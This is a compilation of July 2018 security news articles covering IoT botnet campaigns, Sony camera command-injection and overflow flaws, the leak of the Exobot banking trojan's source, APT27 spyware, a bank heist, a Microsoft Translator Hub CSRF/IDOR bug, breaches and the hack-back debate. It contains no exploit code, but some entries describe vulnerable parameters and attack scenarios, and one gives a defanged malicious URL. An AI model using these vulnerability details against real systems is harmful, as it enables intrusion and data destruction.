The botnet targets a broad range of exploits: two flaws in Dasan GPON routers that were made public in May (which have been targeted by botnets ever since), a Huawei router security bug, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a JAWS Webserver command execution, and a remote code execution in CCTVs and DVRs from over 70 vendors.

The campaign also shows the use of two different encryption schemes, doesn’t attempt to propagate via credential brute-forcing, and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The IP the malware was using for serving payloads and as a command and control (C&C) server was also observed being used by some Gafgyt samples that emerged around the same time.

The second campaign was using the same exploits as the first series of attacks, but also attempted credential brute force attacks, some of which are default credentials in Camtron IP cameras and Control4 and ADC FlexWave Prism devices.

The researchers also noticed that some of the samples included some brand new DDoS methods and that some of the newest samples completely removed the exploits and went back to exclusively attempting brute-force compromise.

The third campaign, the security researchers reveal, was no longer attempting to infect devices with a Mirai variant, but was delivering malware built on the Gafgyt source code that also includes a layer-7 DDoS-targeting function (SendHTTPCloudflare).

The attacks were targeting nearly all exploits as the first campaign, along with the brute-forcing attempts observed as part of the second campaign, but also started using a D-Link DSL-2750B OS command injection exploit.

One of the effects of these new campaigns was a surge in attacks targeting Small-Office/Home Office (SOHO) network devices manufactured by Dasan and D-Link, as eSentire alerted. According to the security firm, over 3000 source IPs were involved in the attack, but all were coordinated by a single-source command.

As Palo Alto Networks points out, the new attacks prove once again how attackers can build large botnets consisting of different types of devices and control them from a single C&C server.

“This is exacerbated by the speed of exploitation in the wild of newly released vulnerabilities and also highlights the need for security vendor reactivity in response to these disclosures, applicable to the subset of these devices that do fall under the protection of security devices,” the security firm concludes.


Sony Patches Remotely Exploitable Vulnerabilities in Network Cameras
23.7.2018 securityweek
Vulnerebility

Two serious, remotely exploitable vulnerabilities in Sony IPELA E Series Network Camera products could allow attackers to execute commands or arbitrary code on affected devices.

Tracked as CVE-2018-3937, the first of the vulnerabilities is a command injection flaw in the measurementBitrateExec functionality of the IPELA E Series Network Camera. These are network facing devices used for monitoring and surveillance.

The issue was discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos, who explain that arbitrary commands could be executed via a specially crafted GET request. An attacker looking to trigger the vulnerability could simply send an HTTP request for that.

“While parsing the input measurement string, there isn't a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address,” the researchers explain.

The second vulnerability is tracked as CVE-2018-3938 and affects the 802dot1xclientcert.cgi functionality of IPELA E Series Camera devices.

“A specially crafted POST can cause a stack-based buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability,” Cisco says.

The 802dot1xclientcert.cgi endpoint, the security researchers explain, is “designed to handle everything related to certificate management for 802.1x.”

When data is received, certain checks are performed and the data is then directly copied to a local buffer via memcpy. However, because the strlen length is not checked against a safe value, a stack-based buffer overflow occurs and an attacker can abuse it to remotely execute commands on the device.

Both vulnerabilities were reported to Sony last month. Featuring a CVSS score of 9.1, both of these issue were found in Sony IPELA E series G5 firmware 1.87.00. Sony released an update last week to address the security bugs.


Software Supply Chain Increasingly Targeted in Attacks: Survey
23.7.2018 securityweek Hacking

Organizations increasingly have to deal with cyberattacks targeting the software supply chain and in many cases they are not adequately prepared to respond to such incidents, according to a report published on Monday by endpoint security firm CrowdStrike.

In supply chain attacks, malicious actors target software makers in an effort to modify their products so that they perform malicious actions of provide a backdoor into the targeted environment.

The NotPetya attack, which involved a Ukrainian tax software firm, and the CCleaner incident, which involved hacking of distribution servers at Piriform, are some of the most well-known examples, but supply chain attacks are becoming increasingly common.

Vanson Bourne, on behalf of CrowdStrike, surveyed 1,300 senior IT decision makers and security professionals in the U.S., Canada, Mexico, the U.K., Australia, Japan, Germany and Singapore in April and May.

The Securing the Supply Chain report shows that roughly one-third of organizations are concerned about supply chain attacks, with 18% and 38% saying that the risk is high and moderate, respectively.

Approximately two-thirds of respondents have experienced some form of supply chain attack. The biotechnology and pharmaceutical sector takes the lead with 82% of organizations encountering such an incident, including 45% being hit in the last 12 months. Other sectors more likely to encounter supply chain attacks include hospitality, entertainment and media (74%), IT and technology (74%), engineering (73%), healthcare (70%) and insurance (68%).

Supply chain attacks

On average, organizations believe it would take them 10 hours to detect an incident, 13 hours to react, 15 hours to respond, and 25 hours to remediate it, which totals 63 hours, the report shows.

A vast majority of respondents that have encountered a supply chain incident reported a financial impact, with an average cost of roughly $1.1 million. The highest costs were reported by the hospitality, entertainment and media sector ($1.44 million) and the lowest in the government sector ($329,000).

Some companies have also paid a ransom to recover from a supply chain attack, with many respondents saying their own organization or others in their industry had paid.

In addition to financial loss, organizations experienced various types of drawbacks following an attack, including the necessity to completely rebuild IT systems (36%), spend more on security (36%), and service/operations disruption (34%).

When it comes to response strategies, over one-third of respondents said they had a comprehensive strategy in place when they suffered an attack and more than half had some level of response pre-planned.

Trust in suppliers is not very high, with only 35% of respondents saying they had been totally certain they would be informed of a cybersecurity incident. On the other hand, 39% of those surveyed said they had lost trust in a supplier over the past year.

Less than a third of the organizations that took part in the survey vetted all suppliers in the past 12 months, and the high profile attacks that came to light last year made the vetting process more rigorous in 59% of cases. Executives have also started changing their attitude in regards to this threat, with 31% becoming more involved, 49% planning to become more involved, and 13% taking more of an interest.


The source code of the Exobot Android banking trojan has been leaked online
23.7.2018 securityaffairs Android

The source code of the Exobot Android banking trojan has been leaked online, researchers already verified its authenticity.
The source code of the Exobot Android banking trojan has been leaked online and experts believe that we will soon assist at a new wave of attacks based on the malware.

The Exobot Android banking trojan was first spotted at the end of 2016 when its authors were advertising it on the dark web.

The authors were advertising it saying that it can be used for phishing attacks, it implements various features of most common banking Trojan such as intercepting SMS messages.

Exobot is a powerful banking malware that is able of infecting even smartphones running the latest Android versions.

In January, the authors decided to stop working at the malware and offered for sale its source code.

Now researchers from Bleeping Computer confirmed to have received a copy of the source code from an unknown individual and shared it with malware researchers from ESET and ThreatFabric in order to verify its authenticity.
“The code proved to be version 2.5 of the Exobot banking trojan, also known as the “Trump Edition,” one of Exobot’s last version before its original author gave up on its development.” reads a blog post published by Bleeping Computer.

Exobot Android banking trojan

According to experts from ThreatFabric the version provided to Bleeping Computer was leaked online in May. It seems that one of the users that purchased the malicious code decided to leak it online.

According to the experts, the source code for the Exobot Android banking Trojan is now being distributed on a few underground hacking forums, this means that threat actors can now work on their own version and also offer it with a malware-as-a-service model.

“In the coming months, we may see Android malware devs slowly migrating their campaigns from BankBot to Exobot, as few will decline a “free upgrade” to a better code.” concluded Bleeping Computers.


Experts believe US Cyber Command it the only entity that can carry out ‘hack backs’
23.7.2018 securityaffairs BigBrothers

The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector.
The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector, and when appropriate, the military’s hacking unit should hit back, this is what three experts said at a panel organized by APCO.

The three experts with experience in the private sector, intelligence community and military, agreed that the private organization victims of cyber attacks have to delegate the response against the attackers to the US Cyber Command.

“I think if it’s going to happen, it’s best in the hands of the government,” said Sean Weppner, chief strategy officer at NISOS Group and a former DOD cyber officer.

The experts highlighted that private companies have no intelligence abilities to attribute the attacks to a specific threat actor and have no specific offensive capabilities to conduct hack backs.

Private companies not only have no capabilities to conduct hack backs, they are not legally authorized to do it.

“The U.S. government should decide how to retaliate against the worst attacks on the country’s private sector, and when appropriate, the military’s hacking unit should hit back, three experts said Monday.” reported CyberScoop.

“The controversial idea entails taking the fight to nefarious actors by attacking their computer network in-kind, probing for exfiltrated data and employing measures to retrieve or destroy stolen information.”

Alex Bolling, the former chief of operations at the CIA’s Information Operations Center, approached the problem of cyber attacks against critical infrastructure that in most of the cases are owned by private entities.

The response of attacks against critical infrastructure operated by private organizations must be delegated to the US Government.

In the majority of the cases, attacks against critical infrastructure are powered by persistent attackers and for this reason, a response requests specific cyber skills and the US CYBERCOM has them.

Speaking of the CYBERCOM Bolling said it is the “agency that is best resourced to respond to threats to [U.S.] national interests…[and] critical infrastructure in the energy, finance and wider commercial space,”

Hack backs the Air Force

Private companies cannot carry out hack backs if we want to avoid a digital far west. A private company that decides to target its attackers is anyway a serious threat to the overall digital community.

“For one, companies venturing out into foreign networks would run the risk of disrupting existing U.S. intelligence or military operations.” continues CyberScoop.

According to Edward Amoroso, CEO of Tag Cyber, the US CYBERCOM should isolate the specific target to hit and attack it limiting the risk of any collateral damage.

“I’d like to think there’s a lot of human intelligence and spy-craft that provides a really good view” to the government, said Amoroso.

Experts warn of the risk of hack back non-responsible party due to a wrong attribution of the attack.

Of course, every threat must be properly approached especially the ones that daily target the U.S. private sector. The three experts urge a proper cyber hygiene to mitigate the risks of cyber attacks and limit the necessity to carry out hack backs.


CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing
23.7.2018 securityaffairs APT

Researchers at CSE Cybsec ZLab analyzed a malicious code involved in a long-term espionage campaign in Syria attributed to Chinese APT27 group.
A few days ago, the security researcher Lukas Stefanko from ESET discovered an open repository containing some Android applications.

APT27 syria

The folder was found on a compromised website at the following URL:

hxxp://chatsecurelite.uk[.]to

This website is written in Arabic language and translating its content it seems to offer a secure messaging app. The homepage shows how the application works and includes some slides about it.

Security researchers from CSE Cybsec Z-Lab analyzed the content of the folder and discovered an Android spyware that was developed to exfiltrate sensitive information from victims’ devices.

The malicious code was used to compromise entities in the area, the researchers discovered that it was part or the arsenal of a Chinese APT group tracked as APT27, aka Golden Rat Organization.

The APT27 group focused its activity in Syria in the last couple of years, it used both Windows and Android malware to compromise target devices. Its code was not so sophisticated, anyway, the activity of the group is still ongoing.

Searching online we have found only one team of researchers that tracked the activity of the APT27 group in Syria since 2016, it was a group of researchers at 360 Threat Intelligence Center.

The analysis published by the team revealed the activity of the APT27 in Syria, the code analyzed by malware analysts at Zlab at CSE Cybsec and the one dissected by 360 Threat Intelligence Center is quite identical.

The 360 Threat Intelligence Center is dated 2017, the experts at CSE Cybsec collected evidence that the cyber espionage is still ongoing and that the threat actor continues to improve its malicious code.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.


"MoneyTaker" Hackers Stole $1 Million From Russian Bank
22.7.2018 securityweek Incindent

A cybercriminal group referred to as MoneyTaker recently managed to steal nearly $1 million from PIR Bank (Russia), according to cybercrime research firm Group-IB.

The theft was performed on July 3 through the Russian Central Bank’s Automated Workstation Client, an interbank system similar to SWIFT. The hackers managed to transfer the funds to 17 accounts at major Russian banks and then cashed them out.

After the incident, the cybercriminals also attempted to maintain persistence in the bank’s network, but were detected. While PIR staff was able to delay the withdrawal of some of the funds, it appears that most of what was stolen has been lost, namely around $920,000 (which is a conservative estimate, according to Group-IB).

Group-IB, which analyzed the incident, says that all evidence points to the MoneyTaker group orchestrating the theft. The investigators discovered tools and techniques previously associated with the group, along with the IP addresses of their command and control (C&C) servers.

The security firm previously reported that MoneyTaker had launched over 20 successful attacks against financial institutions and legal firms in the US, UK and Russia over the past two years. The group has been mainly focused on card processing systems, such as the AWS CBR (Russian Interbank System) and SWIFT (US).

The security researchers established that the attack on PIR Bank started in late May 2018 and that a compromised router of one of the bank’s regional branches was used as entry point.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks,” the researchers say.

The hackers breached the bank’s main network and accessed the AWS CBR, then generated payment orders and sent money to mule accounts prepared in advance. Funds were transferred to accounts at 17 of the largest banks and were immediately cashed out by money mules via ATMs.

The bank employees discovered the unauthorized transactions with large sums on the evening of July 4 and asked the regulator to block the AWS CBR digital signature keys, but weren’t able to stop the financial transfers in time. Thus, the hackers managed to cash out most of the stolen money.

The attackers also cleared OS logs on compromised computers, to hinder analysis. They also left reverse shells onto the bank’s computers to conduct new attacks, but these were discovered during investigation and removed.

Attacks on AWS CBR are not easy to implement, Valeriy Baulin, Head of Digital Forensics Lab Group-IB, says. Thus, such attacks are “not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully.”

“This is not the first successful attack on a Russian bank with money withdrawal since early 2018. We know of at least three similar incidents. A 2016 incident, when МoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind,” Baulin said.


Microsoft Addresses Serious Vulnerability in Translator Hub
22.7.2018 securityweek
Vulnerebility

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Furthermore, Mahmood also discovered that the request also had no Cross-Site Request Forgery (CSRF) protection. This means that an attacker could exploit the CSRF vulnerability to impersonate a legitimate, logged in user and perform actions on their behalf.

An attack scenario, he says, would require for an attacker to know the ProjectID number of a logged in victim. Thus, they could include a URL in a page to issue a remove command and, as soon as the victim visits that page, the request would be sent from their browser and the project removed.

Further analysis of the issue revealed an Indirect Object Reference vulnerability, which could essentially allow an attacker to set any ProjectID in the HTTP project removal request and delete any of the projects in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.


Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
22.7.2018 securityweek ICS

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 2018 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S Federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has little real consequences beyond drawing yet more attention to the issue.

Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russia state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the wide spread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our client's security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-Centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach ensure that only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”


Robocalling Firm Exposes U.S. Voter Records
22.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and has been already indexed by searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files that included audio files with pre-recorded political messages for robocalls dials (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robcent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and files access after being responsibly alerted on the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.


HR Services Firm ComplyRight Suffers Data Breach
22.7.2018 securityweek Incindent

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.ComplyRight hacked

However, ComplyRight says the data breach has only impacted less than 10 percent of the individuals whose tax forms have been prepared on its platform.

An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 2018 and May 22, 2018.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.


Adobe Patches Vulnerability Affecting Internal Systems
22.7.2018 securityweek
Vulnerebility

Adobe has patched what researchers describe as a potentially serious security issue in its internal systems, but the company has downplayed the impact of the vulnerability.

White hat hackers at Germany-based security research firm Vulnerability Lab claim to have discovered that code submitted through some of Adobe’s event marketing registration forms ultimately made its way to one of the company’s main databases, from where it propagated to emails and web services.

Adobe told SecurityWeek that the issue was a cross-site scripting (XSS) bug in a form used for event marketing registration and said a fix had been implemented. If Adobe’s classification of the flaw is accurate, it was likely a persistent XSS.

Vulnerability Lab told SecurityWeek that it analyzed the issue between November 2017 and February 2018, when it reported its findings to the vendor. The company claims it took until May for Adobe to identify the cause of the problem, with a patch being implemented in mid-June.

Following the disclosure, Adobe included Vulnerability Lab on its industry partners page, which also lists CERT/CC, FireEye, Microsoft, Google, Tencent, Qihoo 360, Kaspersky, Palo Alto Networks and others.

The researchers said there were multiple domains where malicious code could have been inserted and there were multiple places where the code would be executed.

“The code was injected to a micro service, from there it was taken to the main application management service. Then it was synced into the main lead database of Adobe and we had several domains where we were able to place our codes with executable content,” explained Benjamin Kunz Mejri, CEO and founder of Vulnerability Lab.

The exploit code was delivered via emails sent out by Adobe and on some of the company’s domains, Kunz Mejri said.

Attack scheme

Vulnerability Lab has published a blog post and an advisory to describe the vulnerability.


Singapore Says Hackers Stole 1.5 Million Health Records in Massive Cyberattack
22.7.2018 securityweek Incindent

Hackers have stolen the health records of 1.5 million Singaporeans including Prime Minister Lee Hsien Loong, authorities said Friday, with the leader specifically targeted in the city-state's biggest ever data breach.

Singapore's health and information ministries said a government database was broken into in a "deliberate, targeted and well-planned" strike, describing the attack as "unprecedented".

"Attackers specifically and repeatedly targeted the personal particulars and outpatient information of Prime Minister Lee Hsien Loong," health minister Gan Kim Yong told a press conference.

Forensic analysis by Singapore's Cyber Security Agency "indicates this is a deliberate, targeted, and well-planned cyber-attack and not the work of casual hackers or criminal gangs," he added.

Officials declined to comment on the identity of the hackers, citing "operational security", but said the prime minister's data has not shown up anywhere on the internet.

"I don't know what the attackers were hoping to find. Perhaps they were hunting for some dark state secret, or at least something to embarrass me," Lee wrote on Facebook.

"My medication data is not something I would ordinarily tell people about, but there is nothing alarming in it."

Hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The compromised data includes personal information and medication dispensed to patients, but medical records and clinical notes have not been affected, the health and communications ministries said.

"Health records contain information that is valuable to governments," said Eric Hoh, Asia-Pacific president of cyber-security firm FireEye.

"Nation-states increasingly collect intelligence through cyber-espionage operations which exploit the very technology we rely upon in our daily lives."

Earlier this month, the US National Intelligence Director Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the cyber-attack. A former judge will head a committee looking into the incident.

While the city-state has some of the most advanced military weaponry in the region, the government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors as varied as high-school students in their basements to nation-states.

In his Facebook post about the attack, Loong warned that "those trying to break into our data systems are extremely skilled and determined. They have huge resources, and never give up trying."

In 2017, hackers broke into a defence ministry database, stealing the information of some 850 Singapore army conscripts and ministry staff.


A Cyber Axis of Evil is Rewriting the Cyber Kill Chain
22.7.2018 securityweek Cyber

Survey of Incident Responders Shows That Businesses Needs to Re-architect Cybersecurity

The cyber kill chain employed by advanced adversaries is changing. Defenders need to evolve their defensive strategies to meet the new challenge; and they need to develop silent hunting skills.

A new study from Carbon Black queried 37 incident response firms that use its threat hunting tool to gain insight into what is happening after an attacker has breached the network. "The inspiration for this report," Tom Kellermann, the author and chief cybersecurity officer at Carbon Black told SecurityWeek, "was, I was tired of seeing reports that are focused on just the vector of attack -- how they got in versus how they stay in. There has been a dramatic shift in how cybercriminals operate -- they have moved from burglary to home invasion, and we now need to be asking different questions. The adversaries are typically inside networks for months."

Key statistics from the report picked out by Kellerman include the predominance of Russia and China as adversaries. Eighty-one percent of respondents highlighted Russia, and 76% highlighted China. Thirty-five percent say that the end goal is espionage.

Sixty percent of the attacks involve lateral movement, indicating that attacks are no longer smash and grab incidents -- adversaries are now intending to stick around for the long game. This is confirmed by the appearance of incident response countermeasures. Nearly half of the respondents have seen instances of counter-incident response. Sixty-four percent have seen instances of secondary C2 being used on a sleep cycle during their IR engagements. Thirty-six percent of attackers use the victim for island hopping; that is, as a supply chain attack. And -- perhaps worryingly -- 10% have witnessed non-ransomware destruction.

Global Cyber threats push businesses to Re-architect cybersecurity"I think the destruction figure is quite worrying if it grows," Kellermann told SecurityWeek; noting that there are already signs that it is doing so. He suggested three primary motivations: activism (possibly patriotic), revenge (for being discovered), and the destruction of forensic evidence. "There's a fundamental lesson we need to take away from this," he said: "we have to become more clandestine and more quiet when we hunt the adversary in our homes. We can no longer shout out, 'I know you're in my house; I've called the police'. That is exactly what Crowdstrike did when it was responsible for investigating the DNC breach, it was too loud in its incident response which is why the Russians dug and burrowed in deeper and deeper -- and that was evidenced in the indictments."

The biggest single takeaway that Kellermann has from this survey is that the way to counter the new long-term, advanced and evasive incursions is to develop silent hunting techniques. If hunting is too noisy, the adversary will simply burrow deeper, employ incident-response countermeasures, or simply destroy the network and leave.

"This evolution coincides with mounting geopolitical tensions," suggests the report. "Nation-states such as Russia, China, Iran and North Korea are actively operationalizing and supporting technologically advanced cyber militias."

Kellermann believes that this new level of attack sophistication is down to the increasing level of nation-state hacking -- although the hacking itself may be done by a national militia rather than direct government employees. "We're seeing cybercriminals act as cyber militias for nation states," he explained.

Take Russia and the GRU units indicted by Deputy Attorney General Rosenstein as an example. "Those GRU units typically in the past didn't have any real level of cyber-attack sophistication. The Silicon Valley of cyber-attack sophistication in Russia was St Petersburg -- so they called upon great cybercriminals like Alexsey Belan and Evgeniy Bogachev to essentially arm them with the greatest zero-day attack code and exploit kits in addition to showing them how to morph and change their kill chain."

The Chinese adversaries are also learning and adapting. "The Chinese," he said, "having learned from the mistakes of their past, where they never practiced good operational security and they were typically too loud when they broke into networks... well, they're becoming much more clandestine and much more elegant in the way they attack corporations. Particularly," he added, "in using island hopping -- as evidenced by the Cloud Hopper campaign where they targeted the SMPs of a dozen major corporations in the West. After compromising the MSPs they then leapfrogged into the corporate networks via their cloud infrastructure for the purposes of economic espionage."

The coincidence of changing and more advanced attacks with the rise of nation state actors is compelling; but suggestions that it is primarily Russia and China is down to the accuracy of attribution.

"This attribution comes from the incident response responders to the survey," says Kellermann. "These folks typically worked in British or US intelligence or law enforcement communities; and they understand the fingerprints, the TTPs associated with specific threat actor groups, and the modus operandi. Not only that, you can typically see the C&Cs and the secondary C&Cs leveraging back to infrastructure that is operated or controlled by specific entities."

Kellermann believes there really is -- effectively -- a cyber axis of evil, primarily comprising Russia, China, North Korea, and to a lesser extent, Iran. The first three have an unwritten operational agreement not to target each other. "None of these three will hack the others, and at the same time they are benefitting from each other's colonization of wide swathes of the West."

